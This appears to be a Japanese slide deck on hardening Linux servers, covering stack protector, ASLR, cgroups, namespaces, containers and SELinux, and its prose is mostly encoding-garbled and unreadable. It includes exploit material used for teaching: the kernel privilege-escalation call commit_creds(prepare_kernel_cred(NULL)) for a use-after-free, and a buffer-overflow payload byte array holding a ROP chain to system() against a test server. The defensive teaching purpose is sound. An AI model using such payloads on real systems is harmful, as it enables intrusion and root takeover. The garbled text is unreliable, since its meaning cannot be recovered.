ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ
[1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html
Ϣʔβۭؒ Χʔωϧۭؒ
ϙʔτ͍ͩ͘͞
Ͳ͏ͧ
ϙʔτͷͨΊͷ
ྖҬͷ֬อ
ϙʔτΛॳظԽ
εϨου1 εϨου1
ϙʔτ΋͏͍͍΍ ϙʔτͷͨΊͷ
ྖҬͷղ์
εϨου2 εϨου2
͠Α͏ͱࢥͬͨΒ
ແ͔ͬͨ

View Slide

͜͜ʹ
-JOVYΧʔωϧͷ
"-4"4FRVFODFSͷॳظԽதͰ
ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ
Use After Free
Χʔωϧͷߏ଄ମʹ͸ଟ਺ͷίʔϧόοΫؔ਺͕ઃఆ͞Ε͍ͯΔ
ղ์ࡁΈͷϝϞϦ͸ಉαΠζͷϝϞϦΛ֬อ͢Δͱ
ߴ֬཰Ͱಉ͡ྖҬΛऔಘͰ͖Δ
ίʔϧόοΫΛ೚ҙͷΞυϨεʹॻ͖׵͑ͯΧʔωϧʹݺ͹ͤΔ
https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619
ϙʔτ͸΋͏ղ์͞ΕͯΔ͚Ͳ
͜͜Ͱϙʔτʹઃఆ͞Εͨ
ίʔϧόοΫΛݺΜͰΔ

View Slide

Use After Free
͜ΕΛར༻ͯ͠ԿΛݺ͹ͤΔ͔
ͦΕ͸΋ͪΖΜ
commit_creds( prepare_kernel_cred( NULL ) );
༁ԶΛrootʹ͠Ζ
ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ

View Slide

Use After Free
$7&
$7&
$7&
ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ
$7&
$7&
$7&
$7&

View Slide

߈ܸऀ͕αʔόΛ
׬શʹঠѲͯ͠͠·ͬͨ

View Slide

ࠣࡉͳෆ۩߹͕
͠͹͠͹αʔόͷ
ηΩϡϦςΟΛ୆ແ͠ʹ͢Δ

View Slide

Ұ൪ྑ͍ͷ͸ෆ۩߹͕ແ͍ࣄ͕ͩ
ͦ͏͸͍ͬͯ΋ෆ۩߹͸ग़ͯ͘ΔͷͰ
ෆ۩߹͸ग़Δ΋ͷͱͯ͠
ग़དྷΔ͚ͩக໋తͳ߈ܸʹ௚݁ͤ͞ͳ͍ҝͷ
ରॲΛߦ͏ඞཁ͕͋Δ

View Slide

TUBDLQSPUFDUPS
f:
push %rbp
mov %rsp,%rbp
sub $0x20,%rsp
mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp)
mov %fs:0x28,%rax
mov %rax,-0x8(%rbp)
xor %eax,%eax
mov -0x14(%rbp),%edx
mov -0x18(%rbp),%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
callq 400400 <[email protected]>
leaveq
retq
f:
push %rbp
mov %rsp,%rbp
mov %edi,-0x4(%rbp)
mov %esi,-0x8(%rbp)
mov -0x4(%rbp),%edx
mov -0x8(%rbp),%eax
add %edx,%eax
pop %rbp
retq
͋Δ࣌
ͳ͍࣌
gccͷ࠷దԽΦϓγϣϯͷ1ͭ
ͳΜ͔
૿͑ͯΔ

View Slide

TUBDLQSPUFDUPS
f:
push %rbp
mov %rsp,%rbp
sub $0x20,%rsp
mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp)
mov %fs:0x28,%rax
mov %rax,-0x8(%rbp)
xor %eax,%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
leaveq
retq
͋ΔݻఆͷΞυϨε͔ΒಡΜͩ஋Λ
ελοΫʹੵΉ
ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
ελοΫͷ஋Λൺֱ͠
Ұக͠ͳ͔ͬͨΒabort͢Δ

View Slide

TUBDLQSPUFDUPS
ؔ਺gͷม਺
ؔ਺gͷม਺
ؔ਺gͷม਺
ؔ਺f͕ऴΘͬͨΒ໭ΔҐஔ
ؔ਺fͷม਺
ؔ਺fͷม਺
ؔ਺gͷSCQ
ϥϯμϜͳ஋
όοϑΝΦʔόʔϥϯͰ
returnΞυϨεΛॻ͖׵͑Δʹ͸
͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ
ؒʹڬ·͍ͬͯΔ
͜ͷ஋Λॻ͖׵͑ͯ͠·͏ͱ
ϓϩάϥϜ͸ҟৗऴྃ͢Δ
όοϑΝΦʔόʔϥϯΛར༻ͨ͠
೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

View Slide

TUBDLQSPUFDUPS
xor %eax,%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
leaveq
retq
ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
ελοΫͷ஋Λൺֱ͠
Ұக͠ͳ͔ͬͨΒabort͢Δ
ελοΫ͕ഁյ͞ΕͨޙͳͷͰ
ຊདྷͷॲཧʹ໭Δ͜ͱ͸Ͱ͖ͳ͍
stack-protector͸
߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ

View Slide

͜͜ʹ
3FE)BUʹΑΔ#MVFCPSOFͷղઆΛషΔ
https://access.redhat.com/security/vulnerabilities/blueborne
࣮ࡍʹTUBDLQSPUFDUPS͕໾ʹཱ͍ͬͯΔέʔε
Blueborne(CVE-2017-1000251)
γεςϜʹBluetoothͰ઀ଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕
γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ
͋Δ͍͸stack protector͕༗ޮʹͳ͍ͬͯͳ͍৔߹
೚ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ

View Slide

TUBDLQSPUFDUPS
stack protector͸ελοΫΛগ͠༨෼ʹ࢖͍
ϝϞϦΞΫηεͱൺֱ͕༨෼ʹൃੜ͢Δ
-fno-stack-protector(σϑΥϧτ)
-fstack-protector(͓͢͢Ί)
-fstack-protector-all
stack protectorΛ࢓ֻ͚ͳ͍
όΠτҎ্ͷจࣈྻΛѻ͏ؔ਺ʹstack protectorΛ࢓ֻ͚Δ
͋ΒΏΔؔ਺ʹstack protectorΛ࢓ֻ͚Δ
࢓ֻ͚͓ͯ͘ͱ໾ʹཱͭͱ͜Ζ͚ͩʹ࢓ֻ͚͓͖͍ͯͨ

View Slide

TUBDLQSPUFDUPS
stack protector͸
ελοΫ্ͰͷϝϞϦഁյΛݕ஌͢Δ
όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ
ελοΫҎ֎ͷ৔ॴͰى͜Γ
ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ৔߹
stack protector͸߈ܸΛ๷͙ࣄ͕Ͱ͖ͳ͍

View Slide

address space layout randomization
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
1ճ໨
2ճ໨

View Slide

00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
…
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
…
1ճ໨
2ճ໨
ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ
7ffeb0a50000-7ffeb0a72000
7fffe276e000-7fffe2790000
system()ʹ౉͢ҝʹॻ͖ࠐΜͩ
γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ
εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

View Slide

00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
…
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
…
1ճ໨
2ճ໨
ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ
7f9e5b63d000-7f9e5b7cc000
7f5e2b2ed000-7f5e2b47c000
system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋
ϥϯμϜʹมԽ͢Δҝ
೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ

View Slide

(gdb) set disable-randomization off
(gdb) run
Starting program: /home/fadis/tiny_server_test/tiny_server
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#1 0x00007fffffffd3a0 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
(gdb) disas 0x7ffff7931f54
No function contains specified address.
ઌఔγΣϧͷ࣮ߦʹ੒ޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ৔߹

View Slide

(gdb) run
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
system()͕ظ଴ͨ͠ΞυϨεͱҟͳΔ৔ॴʹ഑ஔ͞Ε͍ͯΔ
0x00007ffff6f6d350
0x7f51c76cd350
ASLRແ͠ͷ৔߹ʹsystem()͕ஔ͍ͯ͋ͬͨ৔ॴ
࣮ࡍʹsystem()͕
഑ஔ͞Ε͍ͯͨ৔ॴ

View Slide

(gdb) run
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕
ظ଴ͨ͠৔ॴʹͳ͍
0x00007ffff7931f54
No function contains specified address
ASLRແ͠ͷ৔߹ʹpop %rdiͱretq͕͋ͬͨ৔ॴ
ͦ͜ʹؔ਺͸ແ͍

View Slide

(gdb) run
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
ͦͷ݁Ռ
Կ΋ׂΓ౰ͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠
ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ

View Slide

LinuxͷίϯςφΛ׆༻ͤΑ

View Slide

਌ϓϩηεͱࢠϓϩηε
ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ
ͦͷϓϩηε͸ݩͷϓϩηεͷࢠʹͳΔ
ϓϩηε
/bin/ls
execl("/bin/ls","/bin/ls",nullptr );
ىಈ
਌ϓϩηε
ࢠϓϩηε

View Slide

init!"!5*[agetty]
#!busybox
#!login!!!bash!!!top
#!sshd!"!sshd!!!sshd!!!bash!!!pstree
$ %!sshd!!!sshd!!!bash!!!vim
%!udevd
γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ
initҎ֎ͷશͯͷϓϩηε͸
init͔ΒḷΕΔ਌ࢠؔ܎ͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ
initͷࢠͷ
sshd͔Βىಈ͞Εͨ
bash͔Βىಈ͞Εͨ
vim
਌ϓϩηεͱࢠϓϩηε

View Slide

init!"!5*[agetty]
#!busybox
%!udevd
ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ
γεςϜͷϦιʔεͷ࢖༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ
cgroups
ྫ:
͜ͷൣғͷϓϩηε͸
1൪໨ͷCPU͔͠
࢖ͬͯ͸͍͚ͳ͍
(cpuset cgroup)

View Slide

ϒϩοΫI/O cgroup
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
ϒϩοΫσόΠε΁ͷI/OΛ੍ݶ͢Δ
͜ͷάϧʔϓ಺ͷϓϩηε͸
ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ΋
ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ࢖͑ͳ͍
߹ܭ.CQT੍ݶ

View Slide

ະ࢖༻
CPU cgroup
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
CPUͷ࢖༻཰Λ੍ݶ͢Δ
͜ͷάϧʔϓ಺ͷϓϩηε͸
ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ΋
ࢦఆ͞ΕͨҎ্ʹ
CPUΛ࢖͏ࣄ͸Ͱ͖ͳ͍
߹ܭ੍ݶ

View Slide

cgroups
ଞʹ΋ϝϞϦͷ࢖༻཰΍HugeTLBͷׂΓ౰ͯͷ੍ݶͳͲ͕
උΘ͍ͬͯΔ͕
੬ऑੑ߈ܸʹର͢Δඋ͑ͱͯ͠஫໨͢΂͖ͳͷ͸
pids devices
ͱ

View Slide

PIDs cgroups
ࢦఆͨ͠ϓϩηεάϧʔϓ಺Ͱ
࡞੒Ͱ͖Δϓϩηεͷ࠷େ਺Λ੍ݶ͢Δ
ϓϩηε
/bin/ls
execl("/bin/ls","/bin/ls",nullptr );
ىಈ
άϧʔϓ಺ͷϓϩηε਺͕࠷େʹୡ͍ͯ͠Δҝ
ࢠϓϩηεͷੜ੒Λڋ൱

View Slide

socket.connect(
);
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
system()
γΣϧεΫϦϓτ
߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β
೚ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷΋खܰͳํ๏system()͸
தͰࢠϓϩηεΛੜ੒͍ͯ͠Δҝ
ࢠϓϩηε͕ੜ੒ग़དྷͳ͍ͱ߈ܸ͕େม໘౗ʹͳΔ

View Slide

$ g++ sample.c -o sample
$ ./sample
bin dev home lib32 lost+found mnt proc run sys usr
boot etc lib lib64 media opt root sbin tmp var
੒ޭ
$ cgcreate -g pids:test
$ cgset -r pids.max=1 test
$ cgexec -g pids:test ./sample
ࣦഊ
$
#include
#include
int main() {
if( system( "ls /" ) == 0 ) std::cout << "੒ޭ" << std::endl;
else std::cout << "ࣦഊ" << std::endl;
}
system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ಺༰Λදࣔ͢ΔϓϩάϥϜ
ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ
testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ
test಺ͷ࠷େϓϩηε਺Λ1ʹ͢Δ
cgroupΛtestʹͯ͠ಈ͔͢ͱ
system()ʹࣦഊ͢Δ

View Slide

ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ
αʔόͷຊདྷͷ༻్Ͱ΋ࢠϓϩηε͕࡞Εͳ͘ͳΔ
͜ͷख͕࢖͑Δͷ͸
໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ

View Slide

devices cgroups
ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
αʔό
γΣϧ
ىಈ
ࠓ߈ܸऀ͸ҰൠϢʔβͰͷγΣϧͷىಈʹ੒ޭ͠
α΢ϯυσόΠεͷ੬ऑੑΛಥ͍ͯ
rootΛऔΖ͏ͱ͍ͯ͠Δ
CVE-2017-15265
߈ܸऀ
੬ऑͳ
Linux

View Slide

devices cgroups
ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β
৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ
αʔό
γΣϧ
ىಈ CVE-2017-15265
߈ܸऀ
͜ͷάϧʔϓʹ͸α΢ϯυσόΠε͸͍Βͳ͍ഺͳͷͰ
α΢ϯυσόΠεΛ৮ͬͯ͸͍͚ͳ͍ ੬ऑͳ
Linux
͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ

View Slide

໊લۭؒ
ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β
Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ
init!"!5*[agetty]
#!busybox
%!udevd
ྫ:
͜ͷൣғͷϓϩηεʹ͸
֎ͷϓϩηε͕ݟ͑ͳ͍
(PID໊લۭؒ)
bash!!!vim
͜ͷ໊લۭؒʹͱͬͯͷPID1
ຊ౰ͷPID1

View Slide

Ϛ΢ϯτ໊લۭؒ
Ͳ͜ʹԿ͕Ϛ΢ϯτ͞Ε͍ͯΔ͔ͷ৘ใΛ
਌ϓϩηε͔Β෼཭͢Δ
਌ϓϩηε
ࢠϓϩηε
IPHF
GVHB
IPHF
GVHB
਌ϓϩηε͔Βݟ͑Δ/hoge/fuga
ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga
chroot΍umountͱ૊Έ߹ΘͤΔࣄͰ
ࢠϓϩηε͔Β਌ϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ
ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ

View Slide

Ϛ΢ϯτ໊લۭؒ
IPHF
GVHB
߈ܸʹ࢖͑ͦ͏ͳ΋Μ͕
ͳΜ΋ͳ͍…
αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ
σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ
߈ܸऀͷબ୒ࢶΛڱΊΔࣄ͕Ͱ͖Δ
߈ܸऀ

View Slide

UID໊લۭؒ
ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ
௨༻͢ΔrootΛ࡞Γग़͢
߈ܸऀ
Զ͸ࠓ͔Β
rootͩ!

View Slide

UID໊લۭؒ
ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ
௨༻͢ΔrootΛ࡞Γग़͢
߈ܸऀ
rootͷ໋ྩͩͧ! ͋ͳͨ͸ͦͷ○ͷதͰͷΈ
rootͳͷͰμϝͰ͢

View Slide

໊લۭؒ
͜ͷଞʹ΋
ωοτϫʔΫͷઃఆ
cgroupͷઃఆ
઀ଓͰ͖Δϓϩηεؒ௨৴
։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ
ͳͲ৭Μͳ΋ͷΛ
਌ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ

View Slide

طʹ
ؾ͍͍ͮͯΔ͔΋͠Εͳ͍͕

View Slide

cgroupͱ໊લۭؒΛ׆༻ͯ͠
਌ϓϩηεͱࢠϓϩηεʹݟ͑Δ෺
Ͱ͖ΔࣄΛ׬શʹ෼཭ͨ͠ͷ͕
LinuxͷίϯςφͰ͋Δ

View Slide

਌ϓϩηεͱࢠϓϩηεͷ׬શͳ෼཭ͷઃఆΛ
؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕
ྲྀߦΓͷDockerͰ͋Δ
https://www.docker.com/

View Slide

ίϯςφͱϚΠΫϩαʔϏε
cgroupͱ໊લۭؒ͸ϓϩηε୯ҐͰઃఆ͞ΕΔ
1ͭͷڊେͳϓϩηεͰ
αʔϏεΛఏڙ͢ΔΑΓ
୯७ͳػೳΛఏڙ͢ΔαʔόΛ
ωοτϫʔΫͰܨ͍Ͱ
େ͖ͳαʔϏεΛ࡞Δํ͕
ݸʑͷϓϩηεʹ༩͑Δ
ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ

View Slide

ίϯςφͱϚΠΫϩαʔϏε
͜ͷΑ͏ͳߏ੒ʹͯ͋͠Δͱ
ϓϩηεͷ͏ͪͷ1͕ͭ
Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠΋
ͦͷ࣌఺ͰͷӨڹΛ
αʔϏε಺ͷݶΒΕͨྖҬʹ
ͱͲΊΒΕΔ

View Slide

ͨͩ͠
ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ
߈ܸऀ͕ίϯςφͷ֎ʹ୤ग़Ͱ͖ͯ͠·͏
੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰ஫ҙ
ྫ$7&

View Slide

SELinuxΛ׆༻ͤΑ

View Slide

ॴ༗ऀ: Bob
άϧʔϓ: ΧϨʔಉ޷ձ
ύʔϛογϣϯ: ॴ༗ऀͱ
άϧʔϓϝϯόʔ͸
ಡΈॻ͖OK
ݹయతͳ*NIXͷύʔϛογϣϯ
ΧϨʔ԰৘ใ
Alice
(ΧϨʔಉ޷ձձһ)
"MJDF͞Μ͸άϧʔϓϝϯόʔ
άϧʔϓϝϯόʔͷॻ͖ࠐΈ͸0,
Linux
OK
͋ͷϑΝΠϧʹ
ॻ͖͍ͨ

View Slide

͜ͷΑ͏ʹϢʔβ͕ࣗ෼Ͱ
৘ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ
ΞΫηε੍ޚΛ
೚ҙΞΫηε੍ޚ
ͱݺͿ

View Slide

ॴ༗ऀ: Bob
ύʔϛογϣϯ: ॴ༗ऀͱ
άϧʔϓϝϯόʔ͸
ಡΈॻ͖OK
ΧϨʔ԰৘ใ
BobΛࣗশ͢Δ
߈ܸऀ #PC͞Μ͸
ϑΝΠϧͷॴ༗ऀ͔ͩΒ
#PC͞ΜͷཁٻͳΒؒҧ͍ͳ͍
Linux
͋ͷϑΝΠϧΛ
ࣺͯͨ͘ͳͬͨ
OK
ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

View Slide

ॴ༗ऀ: Charlie
ύʔϛογϣϯ: ୭Ͱ΋ಡΈॻ͖ࣗ༝
ۃൿ৘ใ
Charlie
$IBSMJF͞Μ͸
ϑΝΠϧͷॴ༗ऀ͔ͩΒ
$IBSMJF͞ΜͷཁٻͳΒؒҧ͍ͳ͍
Linux
OK
*NIXΑʔΘ͔ΒΜ
777ʹ͠ͱ͍ͯ
ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

View Slide

γεςϜ؅ཧऀ͕γεςϜશମʹ
ηΩϡϦςΟཁ݅Λڧ੍͢Δ
ڧ੍ΞΫηε੍ޚ
͕ཁΔ
ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏
Charlie͕ͲΜͳʹζϘϥͰ΋
γεςϜશମͷηΩϡϦςΟ͸อͨΕΔඞཁ͕͋Δ

View Slide

୭͔ͩΒʙ͕Ͱ͖Δ
ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ
BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ͸
୭͔͸࢖͍෺ʹͳΒͳ͍

View Slide

શͯͷϓϩηεʹ͸਌ࢠؔ܎͕͋Δ
͋Δ೔ͷBob͞Μͷϓϩηε
Bob
ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘
Ոͷ૟আΛ͢Δ

View Slide

ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
Ոͷ૟আΛ͢Δ
Bob
BobʹͳΓ͢·ͨ͠
߈ܸऀ
ϓϩηε͕߈ܸऀͷखʹམͪΔͱ
͜͏͍͏ঢ়ଶʹͳΔ

View Slide

Ոͷ૟আΛ͢Δ
ϓϩηεʹυϝΠϯΛ͚ͭΑ͏
υϝΠϯ͸͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ෇༩͞Ε
ࢠϓϩηεʹҾ͖ܧ͕Ε
SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍
Bob ૟আத
૟আத ͜Ε

View Slide

૟আத ʹΞΫηεͯ͠ྑ͍΋ͷ
Ϧιʔεʹ΋υϝΠϯ(λΠϓ)Λ͚ͭΑ͏
SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍

View Slide

ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ
ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ
Ոͷ૟আΛ͢Δ
Bob
BobʹͳΓ͢·ͨ͠
߈ܸऀ
͢Δͱ߈ܸऀͷϓϩηε͸͜͏ͳΔ
૟আத
૟আத
૟আத

View Slide

Linux
ͳΜ͚ͩͲ
ΧϨʔಉ޷ձͷϊʔτʹॻ͖ࠐΈͤͯ͞
૟আ͍ͤ
υϝΠϯͷෆҰகΛཧ༝ʹ
৘ใ΁ͷΞΫηεΛڋ൱Ͱ͖Δ
BobʹͳΓ͢·ͨ͠
߈ܸऀ
૟আத

View Slide

ॏཁͳϙΠϯτ
୭͔ͩΒڐՄ͢Δ
Ͱ͸ͳ͘
ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ
ʹͳ͍ͬͯΔ

View Slide

Æ
SELinux
ύʔϛογϣϯ
system_u:object_r:
passwd_exec_t
Bob
ॴ༗ऀ: Bob
ॴ༗ऀͷಡΈॻ͖OK
ಡΜͰOK
㲔
SELinux
passwd_exec_t
͸ಡΜͰྑ͍
ಡΜͰOK
૯ධ
ಡΜͰOK
͋ͷϑΝΠϧ
ݟͤͯ
#PC͞Μ͕ࣗ෼Ͱ
ઃఆͰ͖Δൣғ
SELinux
passwd_exec_t
͸࢖ͬͯ͸͍͚ͳ͍
࢖༻ېࢭ
૯ධ
࢖༻ېࢭ
8080
8080൪ϙʔτΛ
࢖͍͍ͨͳ

View Slide

$ sesearch --allow
…
allow passwd_t crack_db_t:dir { getattr ioctl lock open read search };
allow passwd_t crack_db_t:file { getattr ioctl lock open read };
allow passwd_t default_context_t:dir { getattr open search };
